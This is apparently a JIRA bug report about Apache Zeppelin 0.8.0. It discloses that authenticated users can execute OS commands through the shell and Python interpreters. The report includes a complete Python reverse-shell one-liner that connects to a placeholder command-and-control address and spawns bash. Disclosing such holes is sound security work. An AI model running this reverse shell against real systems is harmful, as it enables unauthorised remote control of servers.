GuruRaj created ZEPPELIN-4287:
---------------------------------
Summary: Remote Code Execution
Key: ZEPPELIN-4287
URL: https://issues.apache.org/jira/browse/ZEPPELIN-4287
Project: Zeppelin
Issue Type: Bug
Components: Interpreters
Affects Versions: 0.8.0
Reporter: GuruRaj
Attachments: rce_1.png
Hi Team,
We have noticed that zeppelin is vulnerable to Remote code execution, where
authenticated user will be able to execute arbitrary code on the server with
help of Interpreter.
Case1: User can select the shell interpreter and execute the OS command
directly and can get the reverse shell from there if needed.
Case2: User can select any other interrupter like python and get to execute the
OS commands from there. For example we can get the reverse shell from the below
code
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<c&c
ip>",<port no>));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
--
This message was sent by Atlassian JIRA
(v7.6.14#76016)